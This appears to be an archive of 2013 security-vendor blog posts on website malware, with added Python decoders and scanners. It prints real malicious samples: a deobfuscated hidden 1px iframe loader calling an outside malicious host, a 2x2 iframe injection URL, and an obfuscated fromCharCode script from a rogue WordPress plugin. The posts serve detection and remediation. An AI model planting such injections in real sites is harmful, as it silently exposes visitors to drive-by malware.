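    "0173,015,012,040,040,040,040,0166,0141,0162,040,0153,0170,040,075,040,0144,"
    "0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,"
    "0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162,0141,0155,0145,047,051,"
    "073);w=f;s=[];for(i=0;i<w.length;i++){if(e)s=s+ff(w[i]);}xz(s)"
)
HEX_SNIPPET = (
    'n="0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,'
    '0xe,0xb".split(",");s="";for(i=0;i<n.length;i++){s=s.concat(ss(eval(asq())-1));}'
)

ARRAY_RE = re.compile(r"new\s+Array\s*\(([^)]*)\)")
SPLIT_RE = re.compile(r'"([0-9a-fA-Fx,\s]+)"\s*\.split\(\s*","\s*\)')
# The value subtracted before fromCharCode, e.g. ss(eval(asq())-1): "...)-1)".
OFFSET_RE = re.compile(r"\)\s*-\s*(\d+)\s*\)")


def js_number(tok):
    """Interpret one literal the way a JS engine does (hex, legacy octal, decimal)."""
    tok = tok.strip()
    if tok.lower().startswith("0x"):
        return int(tok, 16)
    if len(tok) > 1 and tok.startswith("0") and tok.isdigit():
        return int(tok, 8)  # 0146 is a legacy octal literal in sloppy-mode JS
    return int(tok, 10)


def find_numeric_array(script):
    """Pull the character-code array out of either obfuscation layout."""
    m = ARRAY_RE.search(script) or SPLIT_RE.search(script)
    if m is None:
        raise ValueError("no numeric array literal found")
    return [js_number(t) for t in m.group(1).split(",") if t.strip()]


def find_offset(script):
    """Constant subtracted from every code before fromCharCode (0 if none)."""
    m = OFFSET_RE.search(script)
    return int(m.group(1)) if m else 0


def decode_numeric_array(script):
    """Reproduce the fromCharCode loop offline instead of letting eval() run it."""
    offset = find_offset(script)
    # fromCharCode keeps only the low 16 bits, so mirror that for odd offsets.
    return "".join(chr((c - offset) & 0xFFFF) for c in find_numeric_array(script))
```

Feeding the full arrays from the threat dumps to decode_numeric_array gives the complete iframe loader, including the src URL, without ever reaching the eval() call.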

The malicious injection

By the time this post was created the site was already down.
The simplified version of the threat is:

(function () {
    var ou = document.createElement('iframe');
    ou.src = 'http://www.suzukigsr600[.]netau[.]net/counter.php';
    ou.style.position = 'absolute';
    ou.style.border = '0';
    ou.style.height = '1px';
    ou.style.width = '1px';
    ou.style.left = '1px';
    ou.style.top = '1px';
    if (!document.getElementById('ou')) {
        // the div markup was swallowed by the blog's HTML rendering; recovered from the octal array above (074,0144,0151,0166,... = "<div ...")
        document.write('<div id=\'ou\'></div>');
        document.getElementById('ou').appendChild(ou);
    }
})();


The iframe loaded the file from an external malicious resource. Such threats are trickier to detect and remediate. Detection of these and other JavaScript obfuscation techniques is built into Website Anti-malware Monitoring, and the user is notified instantly once a threat is identified.

Sunday, March 24, 2013

Common type of malicious iframe injection

Hidden iframe with malicious redirection

This sort of malicious redirection using hidden iframes is a common threat that is detected by Quttera's Website malware scanner. It is actually very easy to detect for website owners whose website has been compromised.

Submission Date: Sun Mar 24 15:11:13 2013
Threat Dump:
[[<iframe src="http://msrepresentaciones.com.ar/wp-content/uploads/2011/10/update.php" width="2" height="2" frameborder="0">]]
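As an added example (not Quttera's detection engine), here is the check a site owner can run over their own pages: parse the HTML and report any iframe that is too small to see or hidden by CSS, which covers the 2x2 iframe above as well as the 1px absolutely positioned iframes from the earlier posts. The sample page is constructed and uses example.invalid placeholders instead of the real domains; the 5px threshold is an assumption.

```python
from html.parser import HTMLParser

# Constructed sample page: one legitimate embed plus three injected iframes in
# the shapes discussed on this page (2x2, 1px absolutely positioned, display:none).
SAMPLE_HTML = """<html><body>
<h1>Nature notes</h1>
<iframe src="https://video.example/embed/123" width="640" height="360"></iframe>
<iframe src="http://example.invalid/wp-content/uploads/2011/10/update.php" width="2" height="2" frameborder="0">
<div id='kx'><iframe src="http://example.invalid/clicker.php" style="position:absolute;border:0;height:1px;width:1px;left:1px;top:1px"></iframe></div>
<iframe src="http://example.invalid/x.php" style="display:none"></iframe>
</body></html>"""

MAX_VISIBLE_PX = 5  # assumed threshold: anything at or below this is effectively invisible


def _px(value):
    """Parse '2', '2px' or ' 1 px ' into an int; None if not a plain pixel number."""
    if value is None:
        return None
    digits = value.strip().lower().replace("px", "").strip()
    return int(digits) if digits.isdigit() else None


def _style_map(style):
    """Turn 'a:b;c:d' into {'a': 'b', 'c': 'd'} with lower-cased keys and values."""
    out = {}
    for decl in (style or "").split(";"):
        if ":" in decl:
            key, val = decl.split(":", 1)
            out[key.strip().lower()] = val.strip().lower()
    return out


def hidden_iframe_reasons(attrs):
    """Return the reasons an <iframe> with these (name, value) attributes looks hidden."""
    a = {k.lower(): v for k, v in attrs}
    style = _style_map(a.get("style"))
    # HTML attributes take precedence over inline CSS, as browsers apply them first.
    width = _px(a["width"]) if "width" in a else _px(style.get("width"))
    height = _px(a["height"]) if "height" in a else _px(style.get("height"))
    reasons = []
    if width is not None and width <= MAX_VISIBLE_PX:
        reasons.append("width %dpx" % width)
    if height is not None and height <= MAX_VISIBLE_PX:
        reasons.append("height %dpx" % height)
    if style.get("display") == "none":
        reasons.append("display:none")
    if style.get("visibility") == "hidden":
        reasons.append("visibility:hidden")
    return reasons


class HiddenIframeScanner(HTMLParser):
    """Collects (src, reasons) for every iframe start tag that looks hidden."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        reasons = hidden_iframe_reasons(attrs)
        if reasons:
            self.findings.append((dict(attrs).get("src", ""), reasons))


def scan_html(html):
    """Scan one page; an unclosed <iframe> like the one in the dump is still reported."""
    parser = HiddenIframeScanner()
    parser.feed(html)
    parser.close()
    return parser.findings
```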

Snapshot from Quttera's Online Malware Scanner:
Wednesday, March 20, 2013

Malicious WordPress plugin. Detection and resolution process.

Our team was contacted regarding the detection of the www.dnexpert.com website as Suspicious by our Online Malware Scanner.
The Online Malware Scanner is available to everyone, and the results are then posted in the database depending on the domain status.

The issue was that this domain was listed in the Suspicious database: http://quttera.com/lists/suspicious. After the issue was resolved we asked for the website owner's agreement to place the whole discussion on our Forum and Blog so that it might help other webmasters detect similar issues.

Mirza kindly agreed, so here is the thread:

We removed his last name for privacy reasons.

On Sat, Mar 16, 2013 at 6:05 PM, Mirza wrote:
Hi guys, My website was infected by a malicious code when I installed a WordPress google analytics plugin from http://wordpress.org/extend/plugins/face-for-all-children-everywhere/ The plugin has since been detected by WordPress and removed as explained here: http://wordpress.org/support/topic/somethings-mixed-up-here I have checked my site and it no longer contains the malicious code, however, your plugin is not allowing me to rescan my site, it keeps giving me the cached results with the 4 malicious code detections. Can you please rescan my site? I don't want my url appearing in the suspicious urls database. My website is: www.dnexpert.com Thank you, Mirza


From: Quttera Support Team To: Mirza Sent: Saturday, 16 March 2013 5:37 PM
Subject: Re: remove from suspicious database
Hi Mirza, Thank you very much for using our WordPress plugin, please take a look at our monitoring service http://quttera.com/website-anti-malware-monitoring. This service will scan your site automatically every 24 hours and notify you if we find something suspicious, thus providing you with the capability to detect malware on your site before it is blacklisted by Google and other blacklisting providers. We scanned your site once again and still see some potentially suspicious files. You can access this new report either from the WordPress plugin or via this link: http://quttera.com/detailed_report/www.dnexpert.com The issue is with this script tag found on several pages:

[[<script type='text/javascript' language='javascript'>
var _ga4 = [];
_ga4.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']);
_ga4.push(['_setOption', '6918518510413211618517817517017118416518918416718218217']);
_ga4.push(['_setOption', '1184165171180193182181185175186175181180128167168185181']);
_ga4.push(['_setOption', '1781871861711291691781751821281841711691861101221261181']);
_ga4.push(['_setOption', '8219011416718718618111416718718618111412212611818219011']);
_ga4.push(['_trackPageview', '1129195130117185186191178171132']);
var t = z = "", l = pos = v = 0, a1 = "arCo", a2 = "omCh";
for (v = 0; v < _ga4.length; v++) t += _ga4[v][1];
l = t.length;
while (pos < l) z += String["fr" + a2 + a1 + "de"](parseInt(t.slice(pos, pos += 3)) - 70);
document.write(z);
</script>]]

The issue here is the dynamic generation of the "fromCharCode" method name, which is treated as a JavaScript code obfuscation method. Are you aware of this script block? Thanks a lot, Michael

On Sat, Mar 16, 2013 at 6:48 PM, Mirza wrote:
Hi there, Thank you very much for replying. Yes, this is the malicious code I am worried about. I believe it was caused by a plugin that has since been removed from the WordPress repository. I have blogged about the entire ordeal here: http://www.dnexpert.com/2013/03/16/website-hacked-removing-the-google-analytics-malicious-wordpress-plugin/ I hope you don't mind me referencing your website and facebook page. Could you please do one more scan as I believe the malicious code was in my cached files which I have subsequently removed. I have also removed the offending WordPress plugin. Thank you very much. Mirza


From: Quttera Support Team To: Mirza Sent: Saturday, 16 March 2013 6:35 PM
Subject: Re: remove from suspicious database
Hi Mirza, Your website was scanned again and found clean. The full report can be found here http://quttera.com/detailed_report/www.dnexpert.com Thank you very much for contacting us. Safe browsing and stay clean! Michael, Quttera support team.

Monday, March 18, 2013

Release 2.7.0

Malicious content detection engine - release 2.7.0

Main fixes:

  • Investigation report enhanced by a dump of binary threats.
  • Instead of threat disassembly, provide a pure dump of memory "\0xAA\0xBB....\0xFD".
  • JavaScript threat dump enhanced by dumping the entire HTML script tag containing the detected threat.
  • Fixed several compilation issues.

CLI-based URL scanner for Windows

What is Quttera URL Scanner

Quttera URL Scanner is a command-line URL scanner designed especially for URL investigation and the detection of malicious files and suspicious scripts hidden in legitimate web content. The application is freeware and is very useful for website owners, as it can be used for periodic rescans of a managed website in order to detect injected hidden suspicious and malicious content before it harms their business. Quttera URL Scanner is provided as a command-line interface (CLI) utility whose core is the specially crafted, patent-pending Quttera investigation engine. It recursively downloads the content of the URL and then investigates it using the Quttera investigation engine. The current version utilizes the open source web crawler wget, which is distributed under the GNU GPL v2 license.

Technology description

The Quttera investigation engine is a non-signature-based, behaviour-analysis engine able to recognize and detect software vulnerability exploits, shellcodes, malicious JavaScript and malicious executable code hidden in legitimate web content such as HTML pages, movies, images, PDF files and others.

Main parts of the investigation engine:

  • x86 emulator for detecting shellcodes and suspicious, malicious sequences of executable CPU instructions
  • JavaScript emulator for detecting malicious JavaScript code and HTML pages
  • PDF reader emulator for detecting malicious PDF files
For downloads and more information see: command-line based URL scanner

Web Malware Scanner plugin for WordPress

Introduction

Quttera malicious content detection technology directly from your WordPress dashboard! Keep your blog malware-free with Quttera Web Malware Scanner. It detects malware, exploits, JavaScript code obfuscation and other suspicious activity. The plugin scans the content of your blog for web-based malware in its various formats; the data is investigated on remote servers by the Quttera malicious content detection engines, and no files are changed on your website. It addresses malware hidden behind HTML, JavaScript, Dynamic HTML, AJAX, Flash, PDF or other valid programming languages and formats, and helps you identify malicious code injection, malicious code obfuscation, auto-generated malicious web content, JavaScript code obfuscation, exploits and much more. Keep your blog safe, protect your visitors from being infected by malware and protect your reputation. Search your blog content for:
  • malicious code
  • vulnerability exploits(shell-codes)
  • JavaScript obfuscation techniques
  • hidden iframes
  • unconditional re-directions
  • any potentially suspicious activity

Features

Quttera Web Malware Scanner is based on the Quttera investigation engine. Its core is a platform with multiple non-signature-based detection and analytic units that identify JavaScript-based attacks, security vulnerability exploits, JavaScript obfuscation techniques and JavaScript packers used to hide malicious content from signature/pattern identification methods. Quttera Web Malware Scanner detects:
  • Security vulnerability exploits referencing system internals (x86 architecture)
  • Security vulnerability exploits referencing process internals (x86 architecture)
  • Suspicious sequences of CPU instructions inside text and binary files (x86 architecture)
  • Hidden JavaScript code generated during emulation of the original script or web page
  • Suspicious JavaScript containing code obfuscation or injection of hidden JavaScript
  • Hidden HTML elements generated during emulation of the original script or web page
  • PDF files containing embedded malicious PE files
  • PDF files containing hidden suspicious actions
  • PDF files containing hidden suspicious elements
  • PDF files containing JavaScript code obfuscation
  • Malformed PDF files
  • Encrypted PDF files
  • Unconditional redirections to external URLs

Download and Install

Download page: WordPress Malware Scanner plugin. See the "Installing Plugins" and "Manual Plugin Installation" sections at http://codex.wordpress.org/Managing_Plugins

How it works

The Quttera Web Malware Scanner plugin interacts with Quttera's Web Investigation Server (WIS) over an HTTP interface and requests a reinvestigation of the specified domain. Both the hosting server name and the Quttera investigation server name can be configured by the user and are not limited to the default values; currently there is only one investigation server, so please do not change it. Website investigation is performed asynchronously and does not require the user to stay on the same page waiting for the result. Once the "Scan my website" button is pressed, the investigation request is sent to the Quttera investigation server. If the user already investigated the website within the last 24 hours, the server returns the latest result; if the last investigation was more than 24 hours ago, the website is investigated again.

Detected suspicious payload/shellcode in linuxfr.org/images/sections/46.png

Quttera investigation engine statistics of the detected payload

Offset of the detected payload: 0

Payload emulation counters:

WRITES_TO_PROCESS_STACK_MEMORY: 15
BUFFER_INSIDE_WRITES_COUNT: 0
REFERENCES_TO_PROCESS_INTERNALS: 0
BUFFER_OUTSIDE_WRITES_COUNT: 6
FAR_JUMPS_COUNT: 0
FULLY_INITIALIZED_INSTRUCTIONS: 92
PROVIDED_ABSOLUTE_MEMORY_ADDRESSES: 0
PROC_CALLS_INSIDE_INV_BUFFER: 0
BUFFER_OUTSIDE_READS_COUNT: 3
UNDEFINED_DIRECT_CALLS: 0
JUMPS_INSIDE_INV_BUFFER: 3
CORRECTLY_PARSED_INSTRUCTIONS: 100
MEMORY_MODIFYING_MATH_INSTRUCTIONS: 0
BUFFER_INSIDE_READS_COUNT: 0
SYSTEM_CALLS_COUNT: 0
UNRECOGNIZED_CALL_TARGETS: 0
REFERENCES_TO_PROCESS_IMPORTS: 0
CORRECT_PROCEDURES_CALLS: 0
EIP_RETRIEVAL_INSTRUCTIONS: 0
JUMPS_TO_PROCESS_INTERNALS: 0
EXECUTED_ARITHMETIC_INSTRUCTIONS: 36
CALLS_TARGETED_IMPORTS_SECTION: 0
UNRECOGNIZED_JUMP_TARGETS: 0
CONSEQUENT_SINGLE_BYTE_INSTRUCTIONS: 72
REFERENCES_TO_PROCESS_EXPORTS: 0
EXECUTES_BITS_OPERATING_INSTRUCTIONS: 0
IMMEDIATE_OPERANDS_INSTRUCTIONS: 0
INDIRECT_BUFFER_REFERENCES: 21
MAX_WRITTEN_MEMORY_BLOCK: 0
CORRECTLY_EXECUTED_INSTRUCTIONS: 100
READS_FROM_PROCESS_STACK_MEMORY: 15
CALLS_TARGETED_EXPORTS_SECTION: 0


Detection disassembly:

MOV DS:[EAX + 0x4E] (0x0000004E),EDX (0x00000000) ;random write instruction
INC EDI (0x00000000)
OR EAX (0x00000000),0x000A1A0A
ADD DS:[EAX] (0x000A1A0A),AL (0x0A) ;random write instruction [suspicious memory write instruction]
OR EAX (0x000A1A0A),0x52444849
ADD DS:[EAX] (0x524E5A4B),AL (0x4B) ;random write instruction [suspicious memory write instruction]
ADD DS:[ECX] (0x00000000),AL (0x4B)
ADD DS:[EAX] (0x524E5A4B),AL (0x4B) ;random write instruction [suspicious memory write instruction]
XOR DS:[EAX] (0x524E5A4B),ECX (0x00000000) ;random write instruction
ADD EAX (0x524E5A4B),DS:[EAX] (0x524E5A4B) ;random read instruction
ADD DS:[EAX] (0x524E5A4B),AL (0x4B) ;random write instruction [suspicious memory write instruction]
MOV DL (0x00),0x0B
XOR AL (0x4B),0xB6
ADD DS:[EAX] (0x524E5AFD),AL (0xFD) ;random write instruction [suspicious memory write instruction]
ADD DS:[ECX] (0x00000000),AL (0xFD)
JNB 0x52 ;random read instruction
INC EDI (0x00000001)
INC EDX (0x0000000B)
ADD DS:[ESI + 0xE91CCE] (0x00E91CCE),CH (0x00) ;random write instruction
ADD DS:[EAX] (0x524E5AFD),AL (0xFD) ;random write instruction [suspicious memory write instruction]
OR DS:[EAX + 0x48] (0x524E5B45),ESI (0x00000000) ;random write instruction
POP ECX (0x00000000)
JNB 0x00
ADD DS:[EBX] (0x00000000),CL (0x00)
ADC DS:[EAX] (0x524E5AFD),EAX (0x524E5AFD) ;random write instruction
ADD DS:[EBX] (0x00000000),CL (0x00)
ADC DS:[ECX] (0x00000000),EAX (0x524E5AFD)
JNLE 0x64 ;random read instruction
INC EAX (0x524E5AFD)
INC ECX (0x00000000)
INC ECX (0x00000001)
INC ECX (0x00000002)
INC ESP (0x0983652F)
INC ESP (0x09836530)
INC ESP (0x09836531)
INC EBP (0x00000000)
INC EBP (0x00000001)
INC EBP (0x00000002)
INC ESI (0x00000000)
INC ESI (0x00000001)
INC ESI (0x00000002)
INC EDI (0x00000002)
INC EDI (0x00000003)
INC EDI (0x00000004)
DEC EAX (0x524E5AFE)
DEC EAX (0x524E5AFD)
DEC EAX (0x524E5AFC)
DEC EDX (0x0000000C)
DEC EDX (0x0000000B)
DEC EDX (0x0000000A)
DEC EBX (0x00000000)
DEC EBX (0xFFFFFFFF)
DEC EBX (0xFFFFFFFE)
DEC ESP (0x09836532)
DEC ESP (0x09836531)
DEC ESP (0x09836530)
DEC EBP (0x00000003)
DEC EBP (0x00000002)
DEC EBP (0x00000001)
DEC ESI (0x00000003)
DEC ESI (0x00000002)
DEC ESI (0x00000001)
DEC EDI (0x00000005)
DEC EDI (0x00000004)
DEC EDI (0x00000003)
PUSH EAX (0x524E5AFB)
PUSH EAX (0x524E5AFB)
PUSH EAX (0x524E5AFB)
PUSH ECX (0x00000003)
PUSH ECX (0x00000003)
PUSH ECX (0x00000003)
PUSH EDX (0x00000009)
PUSH EDX (0x00000009)
PUSH EDX (0x00000009)
PUSH EBX (0xFFFFFFFD)
PUSH EBX (0xFFFFFFFD)
PUSH EBX (0xFFFFFFFD)
PUSH ESP (0x098364FF)
PUSH ESP (0x098364FB)
PUSH ESP (0x098364F7)
PUSH EBP (0x00000000)
PUSH EBP (0x00000000)
PUSH EBP (0x00000000)
PUSH ESI (0x00000000)
PUSH ESI (0x00000000)
PUSH ESI (0x00000000)
POP EAX (0x524E5AFB)
POP EAX (0x00000000)
POP EAX (0x00000000)
POP EDX (0x00000009)
POP EDX (0x00000000)
POP EDX (0x00000000)
POP EBX (0xFFFFFFFD)
POP EBX (0x098364F7)
POP EBX (0x098364FB)
POP ESP (0x098364FF)
POP ESP (0xFFFFFFFD)
POP ESP (0x00000000)
POP EBP (0x00000000)
POP EBP (0x00000000)
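A check worth running before acting on a verdict like the one above, added here as an example and not part of the Quttera report or its engine: the first five instructions in the listing are simply the x86 decoding of a PNG file header. 89 50 4E is MOV DS:[EAX + 0x4E],EDX, 47 is INC EDI, 0D 0A 1A 0A 00 is OR EAX,0x000A1A0A, 00 00 is ADD DS:[EAX],AL and 0D 49 48 44 52 is OR EAX,0x52444849, which together are the PNG signature 89 50 4E 47 0D 0A 1A 0A, the IHDR chunk length 00 00 00 0D and the chunk type "IHDR". Further down, JNB 0x52 / INC EDI / INC EDX is 73 52 47 42 ("sRGB"), and the displacement in ADD DS:[ESI + 0xE91CCE],CH together with the byte before it is AE CE 1C E9, the CRC of an sRGB chunk with rendering intent 0; OR DS:[EAX + 0x48],ESI / POP ECX is 70 48 59 ("pHYs" without its last byte, which the following JNB consumes). The long run of one-byte INC, DEC, PUSH and POP at the end is what bytes in the range 0x40..0x5F (ASCII '@'..'_') look like when decoded as x86, which is one way to arrive at a CONSEQUENT_SINGLE_BYTE_INSTRUCTIONS counter of 72 without any code being present. The script below builds a small PNG of the same shape (a constructed sample, not the linuxfr.org file), walks its chunks verifying every CRC, reports any bytes appended after IEND (a common place to hide a payload inside an image), and measures the share of bytes that fall in that single-byte-opcode range. An image that passes the structural checks with nothing after IEND is a well-formed PNG, and the emulator statistics should be read with that in mind; one that fails a CRC or carries trailing data deserves the closer look.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"   # bytes 89 50 4E 47 0D 0A 1A 0A


def make_chunk(ctype: bytes, data: bytes) -> bytes:
    """Encode one PNG chunk: big-endian length, 4-byte type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_sample_png() -> bytes:
    """Constructed sample (not the file from the report): a 1x1 8-bit greyscale PNG
    carrying the sRGB and pHYs chunks whose bytes show up in the disassembly."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)  # width, height, depth, colour, compression, filter, interlace
    scanline = b"\x00\x80"                              # filter type 0 followed by one grey pixel
    return (PNG_SIGNATURE
            + make_chunk(b"IHDR", ihdr)
            + make_chunk(b"sRGB", b"\x00")              # rendering intent 0; CRC is AE CE 1C E9
            + make_chunk(b"pHYs", struct.pack(">IIB", 2833, 2833, 1))
            + make_chunk(b"IDAT", zlib.compress(scanline))
            + make_chunk(b"IEND", b""))


def parse_png(data: bytes):
    """Walk the chunk list verifying each CRC. Returns (chunks, trailing): chunks is a list
    of dicts with type/offset/length/crc_ok, trailing is whatever follows the IEND chunk."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG: bad signature")
    pos = len(PNG_SIGNATURE)
    chunks = []
    while pos + 12 <= len(data):                         # 12 bytes is the smallest chunk
        (length,) = struct.unpack(">I", data[pos:pos + 4])
        ctype = data[pos + 4:pos + 8]
        body = data[pos + 8:pos + 8 + length]
        crc_field = data[pos + 8 + length:pos + 12 + length]
        if len(body) != length or len(crc_field) != 4:
            raise ValueError("truncated chunk %r at offset %d" % (ctype, pos))
        (stored,) = struct.unpack(">I", crc_field)
        expected = zlib.crc32(ctype + body) & 0xFFFFFFFF
        chunks.append({"type": ctype.decode("latin-1"), "offset": pos,
                       "length": length, "crc_ok": stored == expected})
        pos += 12 + length
        if ctype == b"IEND":
            break
    else:
        raise ValueError("no IEND chunk")
    return chunks, data[pos:]


def single_byte_opcode_ratio(data: bytes) -> float:
    """Share of bytes in 0x40..0x5F. On x86 these are the one-byte INC/DEC/PUSH/POP
    opcodes; they are also ASCII '@'..'_', so text-like data scores high."""
    if not data:
        return 0.0
    return sum(1 for b in data if 0x40 <= b <= 0x5F) / len(data)


def assess(data: bytes) -> dict:
    """Structural verdict: well-formed chunk list, all CRCs good, nothing after IEND."""
    chunks, trailing = parse_png(data)
    return {
        "chunk_types": [c["type"] for c in chunks],
        "all_crc_ok": all(c["crc_ok"] for c in chunks),
        "trailing_bytes": len(trailing),
        "single_byte_opcode_ratio": round(single_byte_opcode_ratio(data), 3),
    }


if __name__ == "__main__":
    good = build_sample_png()
    print("intact image:  ", assess(good))
    # Tamper: flip one byte inside the pHYs data, then append a blob after IEND.
    tampered = bytearray(good)
    phys = next(c for c in parse_png(good)[0] if c["type"] == "pHYs")
    tampered[phys["offset"] + 8] ^= 0xFF
    tampered += b"@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_"
    print("tampered image:", assess(bytes(tampered)))
```

Run it on a real file by replacing build_sample_png() with the bytes read from disk; a CRC failure points at the chunk that was modified, and a non-zero trailing_bytes value gives the offset from which to carve whatever was appended. The opcode-ratio figure is only there to explain the emulator's single-byte instruction count, not to judge the file.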